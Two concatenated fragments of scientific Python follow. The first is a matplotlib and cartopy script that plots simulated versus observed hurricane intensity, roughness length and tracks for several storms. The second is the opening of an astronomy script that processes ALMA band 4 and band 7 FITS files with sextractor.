                Times.append(list(row.keys()))
                line_count += 1
            #print(row)
            rows.append(row)
            values.append(list(row.values()))
            line_count += 1
        print(f'Processed {line_count} lines.')
    Times0=Times[0]
    print(Times0)
    print(values[0])
    print(position[kk])
    # position2[kk] holds [row_start, row_stop, col_start, col_stop] in the grid.
    ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
                              position2[kk][2]:position2[kk][3]])
    # Panel label: (a), (b), ...
    ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
            size=30, **csfont)
    # line_count == number of data rows + 1 (header counted once extra),
    # so this iterates exactly over the rows stored in `values`.
    for i in range(0,line_count-1):
        if i==0:
            # Observed record is in knots: convert to m/s.  The comprehension
            # variable shadows the loop `i` only inside the comprehension.
            tmp=[float(i)*0.5144444 for i in values[i]]
            #tmp=[float(i) for i in values[i]]
        # elif (i!=2 and i!=3):
        else:
            tmp=[float(i) for i in values[i]]
        # else:
        #     continue
        # Katrina/Dorian records are truncated to their valid time windows.
        if hurricanes[kk]=='Katrina':
            plt.plot( Times0[:5], tmp[:5], color = colors[c], \
                      linestyle=list(linestyles.values())[c],\
                      linewidth=5, markersize=sizes[c])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([25, 80])
        elif hurricanes[kk]=='Dorian':
            plt.plot( Times0[:-2], tmp[:-2], color = colors[c], \
                      linestyle=list(linestyles.values())[c],\
                      linewidth=5, markersize=sizes[c])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([25, 80])
        else:
            plt.plot( Times0, tmp, color = colors[c], \
                      linestyle=list(linestyles.values())[c],\
                      linewidth=5, markersize=sizes[c])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
            plt.ylim([25, 80])
        c+=1
    # Thicken the panel frame and ticks.
    for axis in ['top','bottom','left','right']:
        ax.spines[axis].set_linewidth(2)
    ax.tick_params(length=5, width=2)
    fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font, \
               frameon=False)
    # Left-column panels get the y-label, bottom-row panels the x-label.
    if kk==0 or kk==3:
        plt.ylabel(r'Intensity (m/s)', **csfont, fontsize=35)
    if kk==2 or kk==3 or kk==4:
        plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
    plt.title(hurricanes[kk], {'size': 30}, **csfont)
    # NOTE(review): the (partial) figure is re-saved on every iteration; only
    # the file written for the last hurricane contains all panels.
    plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wind_intensity_A.png', dpi=500)
plt.show()
########################
# Plot ZNT time series #
########################
# Same panel layout as the intensity figure, but plotting the roughness
# length Z0 inside the eye on a logarithmic y-axis.  No observed series
# exists here, hence the colors[c+1]/sizes[c+1] offset past the slot
# reserved for observations and the `models` (not `options`) legend.
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
    c=0
    rows=[]
    Times=[]
    Times=[]  # NOTE(review): duplicate of the line above; harmless
    values=[]
    with open(dir_znt_eye[kk], mode='r') as csv_file:
        csv_reader = csv.DictReader(csv_file)
        line_count = 0
        for row in csv_reader:
            if line_count == 0:
                print(f'Column names are {", ".join(row)}')
                Times.append(list(row.keys()))
                line_count += 1
            #print(row)
            rows.append(row)
            values.append(list(row.values()))
            line_count += 1
        print(f'Processed {line_count} lines.')
    Times0=Times[0]
    print(Times0)
    print(values[0])
    print(position[kk])
    ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
                              position2[kk][2]:position2[kk][3]])
    ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
            size=30, **csfont)
    for i in range(0,line_count-1):
        if i==0:
            # No unit conversion: values are already roughness lengths in metres.
            #tmp=[float(i)*0.5144444 for i in values[i]]
            tmp=[float(i) for i in values[i]]
        # elif (i!=2 and i!=3):
        else:
            tmp=[float(i) for i in values[i]]
        # else:
        #     continue
        if hurricanes[kk]=='Katrina':
            plt.plot( Times0[:5], tmp[:5], color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        elif hurricanes[kk]=='Dorian':
            plt.plot( Times0[:-2], tmp[:-2], color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        else:
            plt.plot( Times0, tmp, color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        c+=1
    for axis in ['top','bottom','left','right']:
        ax.spines[axis].set_linewidth(2)
    ax.tick_params(length=5, width=2)
    fig.legend(models, bbox_to_anchor=(0.87, 0.42), prop=font, \
               frameon=False)
    if kk==0 or kk==3:
        plt.ylabel(r'$Z_0$ (m)', **csfont, fontsize=30)
    if kk==2 or kk==3 or kk==4:
        plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
    plt.title(hurricanes[kk], {'size': 30}, **csfont)
    plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_ZNT_eye.png', dpi=500)
plt.show()
########################
# Plot ZNT time series #
########################
# Identical to the eye-Z0 figure above, but reading the eyewall CSVs and
# writing *_ZNT_eyewall.png.
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
    c=0
    rows=[]
    Times=[]
    Times=[]  # NOTE(review): duplicate of the line above; harmless
    values=[]
    with open(dir_znt_eyewall[kk], mode='r') as csv_file:
        csv_reader = csv.DictReader(csv_file)
        line_count = 0
        for row in csv_reader:
            if line_count == 0:
                print(f'Column names are {", ".join(row)}')
                Times.append(list(row.keys()))
                line_count += 1
            #print(row)
            rows.append(row)
            values.append(list(row.values()))
            line_count += 1
        print(f'Processed {line_count} lines.')
    Times0=Times[0]
    print(Times0)
    print(values[0])
    print(position[kk])
    ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
                              position2[kk][2]:position2[kk][3]])
    ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
            size=30, **csfont)
    for i in range(0,line_count-1):
        if i==0:
            # No unit conversion: values are already roughness lengths in metres.
            #tmp=[float(i)*0.5144444 for i in values[i]]
            tmp=[float(i) for i in values[i]]
        # elif (i!=2 and i!=3):
        else:
            tmp=[float(i) for i in values[i]]
        # else:
        #     continue
        if hurricanes[kk]=='Katrina':
            plt.plot( Times0[:5], tmp[:5], color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        elif hurricanes[kk]=='Dorian':
            plt.plot( Times0[:-2], tmp[:-2], color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        else:
            plt.plot( Times0, tmp, color = colors[c+1], \
                      linestyle=list(linestyles.values())[c+1],\
                      linewidth=5, markersize=sizes[c+1])
            plt.xticks(fontsize=25, **csfont)
            plt.yticks(fontsize=25, **csfont)
            plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
            plt.ylim([1e-11, 3.0])
            plt.yscale('log')
        c+=1
    for axis in ['top','bottom','left','right']:
        ax.spines[axis].set_linewidth(2)
    ax.tick_params(length=5, width=2)
    fig.legend(models, bbox_to_anchor=(0.87, 0.42), prop=font, \
               frameon=False)
    if kk==0 or kk==3:
        plt.ylabel(r'$Z_0$ (m)', **csfont, fontsize=30)
    if kk==2 or kk==3 or kk==4:
        plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
    plt.title(hurricanes[kk], {'size': 30}, **csfont)
    plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_ZNT_eyewall.png', dpi=500)
plt.show()
########################
# Plot hurricane track #
########################
# One cartopy map panel per hurricane: the observed track and the simulated
# track(s), clipped to the storm's lat/lon bounding box (lat_log_bound).
# Also computes the great-circle (haversine) track error; R (Earth radius)
# and the plotting helpers/constants are defined earlier in the file.
fig = plt.figure(figsize=(15,10))
spec = mpl.gridspec.GridSpec(ncols=6, nrows=2)
for kk in range(len(hurricanes)):
    # Number of track points to draw (Katrina/Dorian have shorter records).
    if hurricanes[kk]=='Katrina':
        cons=6
    elif hurricanes[kk]=='Dorian':
        cons=8
    else:
        cons=10
    real1=[]
    oussama1=[]
    wrf1=[]
    simu1=[]
    # The track file is a stream of back-to-back JSON objects ("}{"); patch
    # it into a valid JSON array before parsing.
    with open( dir_wt[kk], 'r' ) as f :
        data0 = f.read()
    data = json.loads('[' + data0.replace('}{', '},{') + ']')
    for i in range(0,len(data)):
        data2 = list(data[i].values())
        data3 = [e for sl in data2 for e in sl]  # flatten one nesting level
        for j in range(len(data3)):
            data3[j].pop(0)  # drop the leading non-coordinate field of each point
        if i==0:
            real1.append(data3)  # first object: observed track
        # elif i==1:
        #     oussama1.append(data3)
        # elif i==2:
        #     wrf1.append(data3)
        else:
            simu1.append(data3)  # remaining objects: simulated tracks
    real1 = np.array(real1, dtype=np.float32)
    simu1 = np.array(simu1, dtype=np.float32)
    real_r = np.radians(real1)
    simu_r = np.radians(simu1)
    # Haversine distance between simulated and observed track points:
    # d = 2*R*arcsin(sqrt(sin^2(dlat/2) + cos(lat1)cos(lat2)sin^2(dlon/2))).
    term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
    term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
          np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
          np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
    simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
    # ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]])
    # ax.text(0.05, 0.9, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
    #         size=30)
    # NOTE(review): pickle.loads of a trusted local file; fine here, but never
    # unpickle untrusted data.
    slp2D = pickle.load( open( dir_p[kk], "rb" ) )
    lats, lons = latlon_coords(slp2D)
    # Get the cartopy mapping object (use original data, rather than any processed data)
    cart_proj = get_cartopy(slp2D)
    # Set the GeoAxes to the projection used by WRF
    #ax = plt.axes(projection=cart_proj)
    ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]], projection=cart_proj)
    # ax.stock_img()
    # Download and add the states and coastlines
    states = NaturalEarthFeature(category="cultural", scale="50m",
                                 facecolor="none",
                                 name="admin_1_states_provinces_shp")
    ax.add_feature(states, linewidth=.5, edgecolor="black")
    ax.coastlines('50m', linewidth=0.8)
    # Set the map bounds
    # ax.set_xlim(cartopy_xlim(slp2D))
    # ax.set_ylim(cartopy_ylim(slp2D))
    ax.set_extent(lat_log_bound[kk])
    ax.background_img(name='SR', resolution='high')
    # Show grid lines.
    gl = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True,
                      linewidth=1.5, color='gray', alpha=0.8, linestyle=':')
    gl.xlabel_style = {'size': 15, 'color': 'k','fontname':'Times New Roman'}
    gl.ylabel_style = {'size': 15, 'color': 'k','fontname':'Times New Roman'}
    gl.xlabels_top = False
    gl.ylabels_right = False
    c=0
    ll=[]
    rr=[]
    # Observed track: gather the first `cons` (lat, lon) points, then plot
    # lon (rr) against lat (ll) in PlateCarree coordinates.
    for i in range(real1.shape[0]):
        for j in range(real1.shape[1]):
            if j<cons:
                ll.append(real1[i][j][0])
                rr.append(real1[i][j][1])
    ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, \
             linestyle=list(linestyles.values())[c],\
             markersize=sizes[c], transform=crs.PlateCarree())
    c+=1
    ll=[]
    rr=[]
    # Simulated track(s).
    # NOTE(review): all simulated runs are accumulated into one point list, so
    # multiple runs would be drawn as a single connected line -- confirm that
    # simu1 holds exactly one run per file.
    for i in range(simu1.shape[0]):
        for j in range(simu1.shape[1]):
            if j<cons:
                ll.append(simu1[i][j][0])
                rr.append(simu1[i][j][1])
    ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, \
             linestyle=list(linestyles.values())[c],\
             markersize=sizes[c], transform=crs.PlateCarree())
    c+=1
    ll=[]
    rr=[]
    for axis in ['top','bottom','left','right']:
        ax.spines[axis].set_linewidth(15)
    fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font_wt, \
               frameon=False)
    plt.title(hurricanes[kk], {'size': 25}, **csfont)
    # plt.legend(['Real track','C0.0001', 'C0.01', 'C1', 'C100'],\
    #            loc = "upper right", prop={'size': 7})
    # plt.xlabel("Lon", fontsize=135)
    # plt.ylabel("Lat", fontsize=135)
    # plt.title(hurricanes[kk], {'size': 35}, **csfont)
    # plt.show()
    plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wt.png', dpi=500)
plt.show()
# fig = plt.figure(figsize=(15,10))
# spec = mpl.gridspec.GridSpec(ncols=6, nrows=2)
# for kk in range(len(hurricanes)):
# real1=[]
# oussama1=[]
# wrf1=[]
# simu1=[]
# with open( dir_wt[kk], 'r' ) as f :
# data0 = f.read()
# data = json.loads('[' + data0.replace('}{', '},{') + ']')
# for i in range(0,len(data)):
# data2 = list(data[i].values())
# data3 = [e for sl in data2 for e in sl]
# for j in range(len(data3)):
# data3[j].pop(0)
# if i==0:
# real1.append(data3)
# # elif i==1:
# # oussama1.append(data3)
# # elif i==2:
# # wrf1.append(data3)
# else:
# simu1.append(data3)
# real1 = np.array(real1, dtype=np.float32)
# simu1 = np.array(simu1, dtype=np.float32)
# real_r = np.radians(real1)
# simu_r = np.radians(simu1)
# term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
# term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
# simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# m = Basemap(projection='merc', llcrnrlat=lat_log_bound[kk][2],\
# urcrnrlat=lat_log_bound[kk][3], \
# llcrnrlon=lat_log_bound[kk][0], \
# urcrnrlon=lat_log_bound[kk][1], resolution= 'f' )
# m.drawstates()
# m.drawmeridians([-100, -90, -80, -70, -60, -50, -40, ], color='k', textcolor='k', linewidth=1.5,
# zorder=None, dashes=[6, 1000], labels=[1, 0, 0, 1], labelstyle=None, fmt='%g', xoffset=None,
# yoffset=None, ax=None, latmax=None, fontsize=12)
# m.drawparallels([10, 15, 20, 25, 30, 35], color='k', textcolor='k', linewidth=1.5, zorder=None, dashes=[6, 1000],
# labels=[1, 0, 0, 1], labelstyle=None, fmt='%g', xoffset=None, yoffset=None, ax=None, latmax=None, fontsize=12)
# m.drawmapscale(-101, 8, -96, 8, 1000, barstyle='fancy', units='km', fontsize=8)
# m.drawcoastlines(linewidth=0.7, linestyle='solid', color='grey')
# m.drawcountries()
# m.shadedrelief()
# m.drawmapboundary()
# # ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]])
# # ax.text(0.05, 0.9, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
# # size=30)
# slp2D = pickle.load( open( dir_p[kk], "rb" ) )
# lats, lons = latlon_coords(slp2D)
# # Get the cartopy mapping object (use original data, rather than any processed data)
# cart_proj = get_cartopy(slp2D)
# # Set the GeoAxes to the projection used by WRF
# #ax = plt.axes(projection=cart_proj)
# ax = fig.add_subplot(spec[position[kk][0],position[kk][1]:position[kk][2]], projection=cart_proj)
# ax.stock_img()
# # Download and add the states and coastlines
# states = NaturalEarthFeature(category="cultural", scale="50m",
# facecolor="none",
# name="admin_1_states_provinces_shp")
# ax.add_feature(states, linewidth=.5, edgecolor="black")
# ax.coastlines('50m', linewidth=0.8)
# # Set the map bounds
# # ax.set_xlim(cartopy_xlim(slp2D))
# # ax.set_ylim(cartopy_ylim(slp2D))
# ax.set_extent(lat_log_bound[kk])
# # Show grid lines.
# gl = ax.gridlines(crs=crs.PlateCarree(), draw_labels=True,
# linewidth=1.5, color='gray', alpha=0.8, linestyle=':')
# gl.xlabel_style = {'size': 15, 'color': 'k'}
# gl.ylabel_style = {'size': 15, 'color': 'k'}
# gl.xlabels_top = False
# gl.ylabels_right = False
# c=0
# ll=[]
# rr=[]
# for i in range(real1.shape[0]):
# for j in range(real1.shape[1]):
# if j<6:
# ll.append(real1[i][j][0])
# rr.append(real1[i][j][1])
# ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, linestyle=patterns[c],\
# markersize=sizes[c], transform=crs.PlateCarree())
# c+=1
# ll=[]
# rr=[]
# for i in range(simu1.shape[0]):
# for j in range(simu1.shape[1]):
# if j<6:
# ll.append(simu1[i][j][0])
# rr.append(simu1[i][j][1])
# ax.plot( rr, ll, color = colors[c], marker=markers[c],linewidth=2, linestyle=patterns[c],\
# markersize=sizes[c], transform=crs.PlateCarree())
# c+=1
# ll=[]
# rr=[]
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_linewidth(15)
# fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font_wt, \
# frameon=False)
# plt.title(hurricanes[kk], {'size': 25}, **csfont)
# # plt.legend(['Real track','C0.0001', 'C0.01', 'C1', 'C100'],\
# # loc = "upper right", prop={'size': 7})
# # plt.xlabel("Lon", fontsize=135)
# # plt.ylabel("Lat", fontsize=135)
# # plt.title(hurricanes[kk], {'size': 35}, **csfont)
# # plt.show()
# plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wt.png', dpi=500)
# plt.show()
# ###################
# # Plot error bars #
# ###################
# simu_error = []
# for kk in range(len(hurricanes)):
# rows1=[]
# Times1=[]
# Times1=[]
# values1=[]
# real1_track=[]
# with open(dir_wi[kk], mode='r') as csv_file:
# csv_reader = csv.DictReader(csv_file)
# line_count = 0
# sim_count = 0
# for row in csv_reader:
# if line_count == 0:
# print(f'Column names are {", ".join(row)}')
# Times1.append(list(row.keys()))
# real1_track.append(list(row.values()))
# line_count += 1
# else:
# rows1.append(row)
# values1.append(list(row.values()))
# line_count += 1
# print('There is totally ',(line_count-1)*(len(row)),' data points')
# simu1=np.array(values1, dtype=np.float32)
# real1=np.array(real1_track, dtype=np.float32)
# real1=real1*0.5144444
# real1=real1
# simu_error1=abs(simu1-real1[:,None])/real1[:,None]#/((line_count-3)*(len(row)))
# print('absolute pressure error')
# print(abs(simu1-real1[:,None]))
# simu_error.append(simu_error1)
# par1_error_wi=np.zeros((4, 9))
# par2_error_wi=np.zeros((4, 9))
# par3_erro_wir=np.zeros((4, 9))
# par4_error_wi=np.zeros((4, 9))
# simu_error1 = simu_error[0]
# simu_error2 = simu_error[1]
# simu_error3 = simu_error[2]
# simu_error4 = simu_error[3]
# simu_error5 = simu_error[4]
# par1_error_wi=np.concatenate((simu_error1[0][0][0:5],simu_error2[0][0][:],\
# simu_error3[0][0][:],simu_error4[0][0][:-2],simu_error5[0][0][:]))
# par1_error_wi=par1_error_wi.flatten()
# par1_error_wi_mean=np.mean(par1_error_wi)
# par1_error_wi_std=np.std(par1_error_wi)
# par1_error_wi_low=np.percentile(par1_error_wi, 20)
# par1_error_wi_hgh=np.percentile(par1_error_wi, 80)
# par2_error_wi=np.concatenate((simu_error1[0][1][0:5],simu_error2[0][1][:],\
# simu_error3[0][1][:],simu_error4[0][1][:-2],simu_error5[0][1][:]))
# par2_error_wi=par2_error_wi.flatten()
# par2_error_wi_mean=np.mean(par2_error_wi)
# par2_error_wi_std=np.std(par2_error_wi)
# par2_error_wi_low=np.percentile(par2_error_wi, 20)
# par2_error_wi_hgh=np.percentile(par2_error_wi, 80)
# par3_error_wi=np.concatenate((simu_error1[0][2][0:5],simu_error2[0][2][:],\
# simu_error3[0][2][:],simu_error4[0][2][:-2],simu_error5[0][2][:]))
# par3_error_wi=par3_error_wi.flatten()
# par3_error_wi_mean=np.mean(par3_error_wi)
# par3_error_wi_std=np.std(par3_error_wi)
# par3_error_wi_low=np.percentile(par3_error_wi, 20)
# par3_error_wi_hgh=np.percentile(par3_error_wi, 80)
# par4_error_wi=np.concatenate((simu_error1[0][3][0:5],simu_error2[0][3][:],\
# simu_error3[0][3][:],simu_error4[0][3][:-2],simu_error5[0][3][:]))
# par4_error_wi=par4_error_wi.flatten()
# par4_error_wi_mean=np.mean(par4_error_wi)
# par4_error_wi_std=np.std(par4_error_wi)
# par4_error_wi_low=np.percentile(par4_error_wi, 20)
# par4_error_wi_hgh=np.percentile(par4_error_wi, 80)
# simu_error = []
# for kk in range(len(hurricanes)):
# real1=[]
# oussama1=[]
# wrf1=[]
# simu1=[]
# with open( dir_wt[kk], 'r' ) as f :
# data0 = f.read()
# data = json.loads('[' + data0.replace('}{', '},{') + ']')
# for i in range(0,len(data)):
# data2 = list(data[i].values())
# data3 = [e for sl in data2 for e in sl]
# for j in range(len(data3)):
# data3[j].pop(0)
# if i==0:
# real1.append(data3)
# # elif i==1:
# # oussama1.append(data3)
# # elif i==2:
# # wrf1.append(data3)
# else:
# simu1.append(data3)
# real1 = np.array(real1, dtype=np.float32)
# simu1 = np.array(simu1, dtype=np.float32)
# real_r = np.radians(real1)
# simu_r = np.radians(simu1)
# term1=np.apply_along_axis(Calculate_Distance_Haversine1, 2, simu_r-real_r)
# term2=np.apply_along_axis(Calculate_Distance_Haversine2, 2, simu_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine2, 2, real_r)* \
# np.apply_along_axis(Calculate_Distance_Haversine3, 2, simu_r-real_r)
# simu_error1=2*R*np.arcsin(np.sqrt(term1+term2))
# simu_error.append(simu_error1)
# par1_error=np.zeros((4, 9))
# par2_error=np.zeros((4, 9))
# par3_error=np.zeros((4, 9))
# par4_error=np.zeros((4, 9))
# simu_error1 = simu_error[0]
# simu_error2 = simu_error[1]
# simu_error3 = simu_error[2]
# simu_error4 = simu_error[3]
# simu_error5 = simu_error[4]
# par1_error_wt=np.concatenate((simu_error1[0][0:5],\
# simu_error2[0][:],simu_error3[0][:],\
# simu_error4[0][:-2],simu_error5[0][:]))
# par1_error_wt=par1_error_wt.flatten()
# par1_error_wt_mean=np.mean(par1_error_wt)
# par1_error_wt_std=np.std(par1_error_wt)
# par1_error_wt_low=np.percentile(par1_error_wt, 20)
# par1_error_wt_hgh=np.percentile(par1_error_wt, 80)
# par2_error_wt=np.concatenate((simu_error1[1][0:5],\
# simu_error2[1][:],simu_error3[1][:],\
# simu_error4[1][:-2],simu_error5[1][:]))
# par2_error_wt=par2_error_wt.flatten()
# par2_error_wt_mean=np.mean(par2_error_wt)
# par2_error_wt_std=np.std(par2_error_wt)
# par2_error_wt_low=np.percentile(par2_error_wt, 20)
# par2_error_wt_hgh=np.percentile(par2_error_wt, 80)
# par3_error_wt=np.concatenate((simu_error1[2][0:5],\
# simu_error2[2][:],simu_error3[2][:],\
# simu_error4[2][:-2],simu_error5[2][:]))
# par3_error_wt=par3_error_wt.flatten()
# par3_error_wt_mean=np.mean(par3_error_wt)
# par3_error_wt_std=np.std(par3_error_wt)
# par3_error_wt_low=np.percentile(par2_error_wt, 20)
# par3_error_wt_hgh=np.percentile(par2_error_wt, 80)
# par4_error_wt=np.concatenate((simu_error1[3][0:5],\
# simu_error2[3][:],simu_error3[3][:],\
# simu_error4[3][:-2],simu_error5[3][:]))
# par4_error_wt=par4_error_wt.flatten()
# par4_error_wt_mean=np.mean(par4_error_wt)
# par4_error_wt_std=np.std(par4_error_wt)
# par4_error_wt_low=np.percentile(par4_error_wt, 20)
# par4_error_wt_hgh=np.percentile(par4_error_wt, 80)
# print(par4_error_wt_low, par4_error_wt_mean, par4_error_wt_hgh)
# x_pos = np.arange(len(models))
# CTEs_wi = [par1_error_wi_mean,\
# par2_error_wi_mean,par3_error_wi_mean,par4_error_wi_mean]
# errors_wi = [par1_error_wi_std,\
# par2_error_wi_std,par3_error_wi_std,par4_error_wi_std]
# percentile_10_wi = np.array([par1_error_wi_mean-par1_error_wi_low,\
# par2_error_wi_mean-par2_error_wi_low,par3_error_wi_mean-par3_error_wi_low, \
# par4_error_wi_mean-par4_error_wi_low])
# percentile_90_wi = np.array([par1_error_wi_hgh-par1_error_wi_mean,\
# par2_error_wi_hgh-par2_error_wi_mean,par3_error_wi_hgh-par3_error_wi_mean, \
# par4_error_wi_hgh-par4_error_wi_mean])
# err_wi = np.vstack((percentile_10_wi, percentile_90_wi))
# CTEs_wt = [par1_error_wt_mean,\
# par2_error_wt_mean,par3_error_wt_mean,par4_error_wt_mean]
# errors_wt = [par1_error_wt_std,\
# par2_error_wt_std,par3_error_wt_std,par4_error_wt_std]
# percentile_10_wt = np.array([par1_error_wt_mean-par1_error_wt_low,\
# par2_error_wt_mean-par2_error_wt_low,par3_error_wt_mean-par3_error_wt_low, \
# par4_error_wt_mean-par4_error_wt_low])
# percentile_90_wt = np.array([par1_error_wt_hgh-par1_error_wt_mean,\
# par2_error_wt_hgh-par2_error_wt_mean,par3_error_wt_hgh-par3_error_wt_mean, \
# par4_error_wt_hgh-par4_error_wt_mean])
# print(percentile_90_wt)
# err_wt = np.vstack((percentile_10_wt, percentile_90_wt))
# # fig, ax = plt.subplots(1, 2, figsize=(40, 8), sharex=True)
# fig = plt.figure(figsize=(8,5))
# spec = mpl.gridspec.GridSpec(ncols=8, nrows=5)
# ax = fig.add_subplot(spec[1:,0:4])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[0]+')', transform=ax.transAxes,
# size=15, **csfont)
# bars = ax.bar(x_pos, CTEs_wi, yerr=err_wi, align='center', \
# color=['blue','cyan','gray', 'red'], alpha=0.8,\
# ecolor='k', capsize=10, edgecolor='k', linewidth=3)
# for i in range(len(x_pos)):
# bars[i].set(linestyle=list(linestyles.values())[0])
# ax.set_ylabel(r'Normalized Intensity', **csfont, fontsize=15)
# vals = ax.get_yticks()
# ax.set_yticklabels(['{:,.0%}'.format(x) for x in vals])
# ax.set_xticks(x_pos)
# ax.set_xticklabels(models, **csfont, fontsize=10)
# #ax.set_title(r'COAWST', **csfont, fontsize=20)
# ax.yaxis.grid(True)
# ax = fig.add_subplot(spec[1:,4:])
# ax.text(0.05, 0.9, '('+string.ascii_lowercase[1]+')', transform=ax.transAxes,
# size=15, **csfont)
# bars = ax.bar(x_pos, CTEs_wt, yerr=err_wt, align='center', \
# color=['blue','cyan','gray', 'red'], alpha=0.8,\
# ecolor='k', capsize=10, edgecolor='k', linewidth=3)
# for i in range(len(x_pos)):
# bars[i].set(linestyle=list(linestyles.values())[0])
# ax.set_ylabel(r'Track Error (km)', **csfont, fontsize=15)
# vals = ax.get_yticks()
# ax.set_yticklabels(['{}'.format(x) for x in vals])
# ax.set_xticks(x_pos)
# ax.set_xticklabels(models, **csfont, fontsize=10)
# #ax.set_title(r'COAWST', **csfont, fontsize=20)
# ax.yaxis.grid(True)
# ax = fig.add_subplot(spec[0,0:])
# handles = [plt.Rectangle((0,0),1,1, facecolor=colors[i+1], \
# linestyle=list(linestyles.values())[0], edgecolor = 'k', linewidth=1.5\
# ) for i in range(len(models))]
# plt.legend(handles, models, ncol=4, bbox_to_anchor=(0.9, 0.8), prop=fontbar, \
# frameon=False)
# ax.axes.xaxis.set_visible(False)
# ax.axes.yaxis.set_visible(False)
# ax.set_yticks([])
# ax.set_yticklabels([])
# ax.set_xticks([])
# ax.set_xticklabels([])
# for axis in ['top','bottom','left','right']:
# ax.spines[axis].set_visible(False)
# # for i, v in enumerate(CTEs):
# # ax.text(i, v+0.02, str(round(v, 3)), color='red', fontweight='bold')
# # Save the figure and show
# fig.autofmt_xdate()
# plt.tight_layout()
# #plt.savefig('wind_intensity_bar_plot.png')
# plt.savefig('C:/Users/limgr/Desktop/wi_wt_bar_plots.png', dpi=500)
# plt.show()
|
#!/d/users/turner/tools/anaconda3/bin/python
"""
big 'ole python script that (hopefully) goes through the entire science procedure for given band 4 and band 7 fits files
notes are given in science.md
**python3**
to run:
ipython
exec(open('science.py').read())
"""
import numpy as np
import matplotlib.pyplot as plt
import astropy
from astropy.io import fits
import os, sys, subprocess
from astropy import constants as const
# add scripts directory to the path
sys.path.insert(0, '/uwpa2/turner/legus-alma/scripts/')
from ds9_regions_from_sextractor import get_regions
from get_sextractor_in_footprint import in_footprint
from overlapping_regions import overlap
from mcmc_error_bars import mcmc_error
from nearest_cluster import nearest_cluster
"""
if starting with new band 4 and band 7 fits files, you need to:
1. make sure to have pbcoverage files
2. take global.deg.reg and make new pixel files for band 4 and band 7
data1 --> results for sextractor with 5 pixels > 2 sigma
data2 --> results for sextractor with 5 pixels > 2.5 sigma
data3 --> results for sextractor with 5 pixels > 3.0 sigma
data4 --> retry sextractor 5pix > 2 sigma
data5 --> retry sextractor 5pix > 2.5 sigma
data6 --> retry sextractor 5pix > 3.0 sigma
data7 --> sextractor 2pix > 2 sigma
